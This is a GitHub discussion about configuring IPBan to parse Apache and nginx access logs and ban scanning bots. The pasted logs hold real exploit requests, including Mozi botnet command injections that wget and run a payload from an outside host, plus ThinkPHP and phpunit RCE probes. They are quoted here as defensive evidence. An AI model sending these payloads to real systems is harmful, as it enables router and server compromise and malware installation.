Possible to add Apache logs to IPBan? #140

jjxtra · 2021-03-12T17:49:22Z

jjxtra
Mar 12, 2021
Maintainer

Hello,

I've just setup a WAMP server (https://www.uniformserver.com/) on my Windows 10 computer and was wondering if IPBan could help me secure it. I would like to add Apache logs to IPBan (which are located at «D:\Logiciels\UniServerZ\core\apache2\logs\access.log»).

Since MySQL and phpmyadmin are only accessible locally, there are no failed login attempts in the logs. What bothers me though are the following lines that are probably executed by bots looking for vulnerabilities in web servers:

XXX.XXX.XXX.XXX - - [10/Mar/2021:23:43:11 -0500] "Gh0st\xad" 400 226
XXX.XXX.XXX.XXX - - [10/Mar/2021:23:43:15 -0500] "HELP" 400 226
XXX.XXX.XXX.XXX - - [10/Mar/2021:23:43:15 -0500] "\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n" 400 226
XXX.XXX.XXX.XXX - - [10/Mar/2021:23:43:17 -0500] "\x16\x03\x01" 400 226
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:29:07 -0500] "GET /wp-login.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:29:23 -0500] "GET /wordpress/wp-login.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:29:35 -0500] "GET /blog/wp-login.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:29:50 -0500] "GET /wp/wp-login.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:45:05 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://XXX.XXX.XXX.XXX:47037/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 3167
XXX.XXX.XXX.XXX - - [11/Mar/2021:02:19:15 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 226
XXX.XXX.XXX.XXX - - [11/Mar/2021:03:43:56 -0500] "GET /a2billing/customer/templates/default/footer.tpl HTTP/1.1" 404 1183
XXX.XXX.XXX.XXX - - [11/Mar/2021:03:43:58 -0500] "\x16\x03\x01" 400 226
XXX.XXX.XXX.XXX - - [11/Mar/2021:04:08:37 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:04:34:03 -0500] "GET /recordings/ HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:05:18:43 -0500] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 301 -XXX.XXX.XXX.XXX - - [11/Mar/2021:06:01:32 -0500] "GET /about.php HTTP/1.1" 301 -

etc.

Could IPBan help with this?

Thank you very much for your time!

jjxtra · 2021-03-12T17:55:02Z

jjxtra
Mar 12, 2021
Maintainer Author

@s-bourdon IPBan can definitely parse this file, you would need to decide what expressions to pull out of the line to block the ip and create a LogFile entry with a regex that matches the other log file entries in the ipban.config file. Your regex needs an ipaddress group, and optionally a username group.

23 replies

s-bourdon Mar 15, 2021

OK, thanks!

I'm testing my log file on regex101 and I think something might be wrong...

I've never used regex101 before but if I understand correctly, lines ending with a «200» code are being flagged but lines just below them (ending with 301) are accepted!
Could this be because lines ending with a «200» code are also being followed by another number?

Here's a screenshot:

Again, I may be wrong so before trying it live on my website, I prefer to wait for your confirmation! ;)

Thank you very much!

jjxtra Mar 15, 2021
Maintainer Author

I tweaked the regex, looks like it was being greedy and reading through lines to get to the numbers

s-bourdon Mar 16, 2021

Excellent!
With this tweaked version of your regex, every entry in my log file were correctly identified on regex101 as either legit or malicious.
Thank you vey much!

I will now add the code to the ipban.config file and let it run for a few days.
I'll get back with the results later this week.

Many thanks!

jjxtra Mar 16, 2021
Maintainer Author

Lookin forward to your results. If they look good in a few days I'll make a recipe for this.

fahmiegerton Apr 30, 2021

Hello @jjxtra , I also need this to work with nginx for Windows. Here's the log.

80.247.98.42 - - [28/Apr/2021:22:09:14 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
209.141.33.74 - - [28/Apr/2021:22:20:00 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 444 0 "http://36.90.108.168:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
104.140.188.10 - - [28/Apr/2021:22:21:29 +0800] "GET / HTTP/1.1" 444 0 "-" "https://gdnplus.com:Gather Analyze Provide."
209.141.35.17 - - [28/Apr/2021:22:39:50 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible, MSIE 10.0, Windows NT, DigExt)"
209.141.35.17 - - [28/Apr/2021:22:39:51 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible, MSIE 10.0, Windows NT, DigExt)"
190.122.112.42 - - [28/Apr/2021:22:51:51 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 444 0 "-" "Hello, World"
71.6.232.4 - - [28/Apr/2021:22:59:29 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
115.61.115.96 - - [28/Apr/2021:23:22:17 +0800] "POST /HNAP1/ HTTP/1.0" 444 0 "-" "-"
167.248.133.40 - - [29/Apr/2021:00:32:16 +0800] "GET / HTTP/1.1" 444 0 "-" "-"
167.248.133.40 - - [29/Apr/2021:00:32:18 +0800] "GET / HTTP/1.1" 400 248 "-" "-"
167.248.133.40 - - [29/Apr/2021:00:32:19 +0800] "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
209.141.48.140 - - [29/Apr/2021:00:35:36 +0800] "GET / HTTP/1.1" 444 0 "http://36.90.108.168:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
45.155.205.27 - - [29/Apr/2021:00:36:31 +0800] "POST /api/jsonws/invoke HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:00:36:31 +0800] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:00:36:32 +0800] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:00:36:32 +0800] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:00:36:32 +0800] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:00:36:33 +0800] "GET /solr/admin/info/system?wt=json HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:00:36:33 +0800] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:00:36:33 +0800] "GET /_ignition/execute-solution HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:00:36:33 +0800] "GET /console/ HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:00:36:34 +0800] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:00:36:35 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
104.248.83.170 - - [29/Apr/2021:01:49:53 +0800] "GET / HTTP/1.0" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
209.141.46.206 - - [29/Apr/2021:02:11:29 +0800] "GET /config/getuser?index=0 HTTP/1.1" 400 248 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
118.97.50.28 - - [29/Apr/2021:02:27:52 +0800] "GET / HTTP/1.1" 444 0 "-" "python-requests/2.18.4"
188.162.188.88 - - [29/Apr/2021:02:35:22 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
188.162.188.88 - - [29/Apr/2021:02:35:22 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
188.162.188.88 - - [29/Apr/2021:02:35:23 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
192.241.215.169 - - [29/Apr/2021:02:38:36 +0800] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
182.126.236.187 - - [29/Apr/2021:02:47:11 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://182.126.236.187:41898/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 444 0 "-" "Hello, world"
51.103.79.241 - - [29/Apr/2021:02:49:41 +0800] "GET /.env HTTP/1.1" 444 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
120.85.118.128 - - [29/Apr/2021:02:54:44 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 444 0 "-" "Hello, World"
183.136.225.14 - - [29/Apr/2021:02:57:04 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
61.219.11.153 - - [29/Apr/2021:03:09:34 +0800] "GET / HTTP/1.1" 400 150 "-" "-"
190.152.147.114 - - [29/Apr/2021:03:51:19 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
209.141.33.74 - - [29/Apr/2021:03:58:55 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 444 0 "http://36.90.108.168:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
138.0.227.93 - - [29/Apr/2021:04:01:05 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
74.120.14.39 - - [29/Apr/2021:04:21:35 +0800] "GET / HTTP/1.1" 444 0 "-" "-"
74.120.14.39 - - [29/Apr/2021:04:21:38 +0800] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xD4\x19\xB7\x9B\x82\xFFH\x9CA|\xAF>\x1E<\xA7iV\xBBKD\xB6\x0F\x9E)\xC1\x7F\x8FvB^\x8C\xB3\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0" 400 150 "-" "-"
83.147.223.4 - - [29/Apr/2021:04:21:41 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
193.118.53.210 - - [29/Apr/2021:05:03:03 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
89.248.170.22 - - [29/Apr/2021:05:59:29 +0800] "HEAD / HTTP/1.0" 444 0 "-" "-"
66.240.205.34 - - [29/Apr/2021:06:35:42 +0800] "145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==" 400 150 "-" "-"
195.5.7.147 - - [29/Apr/2021:07:05:57 +0800] "POST /HNAP1/ HTTP/1.0" 444 0 "-" "-"
89.248.170.22 - - [29/Apr/2021:07:36:40 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
209.141.51.242 - - [29/Apr/2021:07:55:03 +0800] "GET /config/getuser?index=0 HTTP/1.1" 444 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
170.130.187.46 - - [29/Apr/2021:08:16:23 +0800] "GET / HTTP/1.0" 444 0 "-" "https://gdnplus.com:Gather Analyze Provide."
193.118.53.202 - - [29/Apr/2021:08:28:01 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
209.141.33.74 - - [29/Apr/2021:08:49:00 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 444 0 "http://36.90.108.168:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
89.248.165.47 - - [29/Apr/2021:08:54:16 +0800] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 150 "-" "-"
104.131.27.218 - - [29/Apr/2021:09:20:21 +0800] "GET /.env HTTP/1.1" 444 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
192.241.217.174 - - [29/Apr/2021:09:36:44 +0800] "GET /actuator/health HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
45.155.205.27 - - [29/Apr/2021:09:40:49 +0800] "POST /api/jsonws/invoke HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:09:40:50 +0800] "GET /_ignition/execute-solution HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:09:40:52 +0800] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:09:40:52 +0800] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:09:40:54 +0800] "GET /console/ HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:09:40:55 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:09:40:58 +0800] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:09:40:58 +0800] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:09:41:00 +0800] "POST /mifs/.;/services/LogService HTTP/1.1" 444 0 "https://36.90.108.168:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.27 - - [29/Apr/2021:09:41:02 +0800] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
159.65.20.78 - - [29/Apr/2021:10:28:21 +0800] "GET /.env HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
181.197.64.148 - - [29/Apr/2021:11:03:59 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.79.218.30 - - [29/Apr/2021:11:38:04 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
64.62.197.152 - - [29/Apr/2021:11:42:28 +0800] "GET / HTTP/1.1" 444 0 "-" "-"
183.136.225.16 - - [29/Apr/2021:11:58:06 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
139.162.116.133 - - [29/Apr/2021:12:01:06 +0800] "GET / HTTP/1.1" 444 0 "-" "HTTP Banner Detection (https://security.ipip.net)"
82.221.105.6 - - [29/Apr/2021:12:06:42 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
82.221.105.6 - - [29/Apr/2021:12:06:47 +0800] "GET /robots.txt HTTP/1.1" 444 0 "-" "-"
82.221.105.6 - - [29/Apr/2021:12:06:48 +0800] "GET /sitemap.xml HTTP/1.1" 444 0 "-" "-"
82.221.105.6 - - [29/Apr/2021:12:06:48 +0800] "GET /.well-known/security.txt HTTP/1.1" 444 0 "-" "-"
34.76.80.167 - - [29/Apr/2021:12:06:59 +0800] "GET / HTTP/1.1" 444 0 "-" "python-requests/2.25.1"
117.247.204.78 - - [29/Apr/2021:12:23:19 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 444 0 "-" "Hello, World"
178.175.125.114 - - [29/Apr/2021:12:23:28 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://178.175.125.114:55370/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 444 0 "-" "-"
51.159.23.43 - - [30/Apr/2021:15:26:20 +0800] "GET / HTTP/1.1" 444 0 "-" "-"
89.248.170.22 - - [30/Apr/2021:15:26:31 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
172.104.242.173 - - [30/Apr/2021:15:43:51 +0800] "\xBA\xABd\xA1EZC\xDBM\x87\xEE^\xFD\xBF\x159 X\xD4>\x12\x98\xC4<\xE0\x13\xCF\x00\xAC\xA09\xD7\x90#8~\x8C\xDE\x9DReF\xBF%1Q\xE0\x9D\x06&g\xBB\x82\x95\x19\xED\x07\x14\x19ZP\x80+\x94e\xC3\xE6\x85\x06\xA4\x99\x8B\x19l\x01\xEA\x88Y\x91\x16\x95\xC4\xC8\x0EH\x02\xC7\x93g\xC14FW\x05|\xFB\xF3T\xB8\xFD\xCB\xBB)\xE3\xCE\xDD\xCD7\x9E\xEFP\x8C\xA4[V\xFD\x98\xC9l\x82\xF5\xE4\xC1d\x87X\xF7\x9B\xBF\xE8q\x12\x99&\xDB,\xF5\x87\xD7\xA8\x97j;\xE3\xEA\xA7\xB4\xB0\x02\xAD\x8DE\x9B\xAAB\x80\x0E)\xA9\xE9\xAF}\x18\x8E\xB8\x1E\x99\x04\xEF\xA8\x8C\xE8\x04\xE2\xD3\xED)1\x91\xC1\x8F\x88\x8C\x81\xF0\xDB\xA5\x88\x95H\x9BZ\xAB\xCE\xBF\xF4E%P*\x88KFY6\x9E\xE7::j\xD4\x8A\xA8V\x9A\xAA\xAB\xAF\xC3&.\xED[\x04\xC5e\x7F\x08\xBE\x8Ar\xA7\xB0\x99F\xF7\x11\xE5\xD6\x96\x8CIm+w\x1C\xFDuU\x14\x0F!x\xAC\xE8MPy\xC3\x19!2\xA0\xED\xC0}!Rw\x14\x8E\x1B\xC4\xE1\xA0\xAF+\xADKk\xC5\xE0\x5Cs\x9C\xBD\xCB" 400 150 "-" "-"
192.241.216.138 - - [30/Apr/2021:16:57:52 +0800] "GET /portal/redlion HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
193.118.53.194 - - [30/Apr/2021:17:00:02 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:17:09:35 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:17:09:35 +0800] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:17:09:38 +0800] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:17:09:40 +0800] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:17:09:41 +0800] "POST /mifs/.;/services/LogService HTTP/1.1" 444 0 "https://125.160.120.137:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:17:09:43 +0800] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:17:09:44 +0800] "GET /console/ HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:17:09:45 +0800] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:17:09:47 +0800] "GET /_ignition/execute-solution HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:17:09:47 +0800] "POST /api/jsonws/invoke HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
89.248.170.22 - - [30/Apr/2021:17:23:51 +0800] "HEAD / HTTP/1.0" 444 0 "-" "-"
192.241.220.215 - - [30/Apr/2021:17:26:46 +0800] "GET /actuator/health HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
128.14.133.58 - - [30/Apr/2021:17:40:03 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
74.120.14.37 - - [30/Apr/2021:17:41:07 +0800] "GET / HTTP/1.1" 444 0 "-" "-"
74.120.14.37 - - [30/Apr/2021:17:41:09 +0800] "GET / HTTP/1.1" 400 248 "-" "-"
74.120.14.37 - - [30/Apr/2021:17:41:09 +0800] "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
192.241.212.72 - - [30/Apr/2021:18:36:39 +0800] "GET /hudson HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
189.39.247.159 - - [30/Apr/2021:19:01:06 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
80.82.77.192 - - [30/Apr/2021:19:18:14 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
80.82.77.192 - - [30/Apr/2021:19:22:45 +0800] "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 zgrab/0.x"
190.94.151.114 - - [30/Apr/2021:19:40:19 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
92.118.161.21 - - [30/Apr/2021:19:47:03 +0800] "GET / HTTP/1.1" 444 0 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
128.14.211.186 - - [30/Apr/2021:19:58:55 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
119.15.88.56 - - [30/Apr/2021:20:46:18 +0800] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
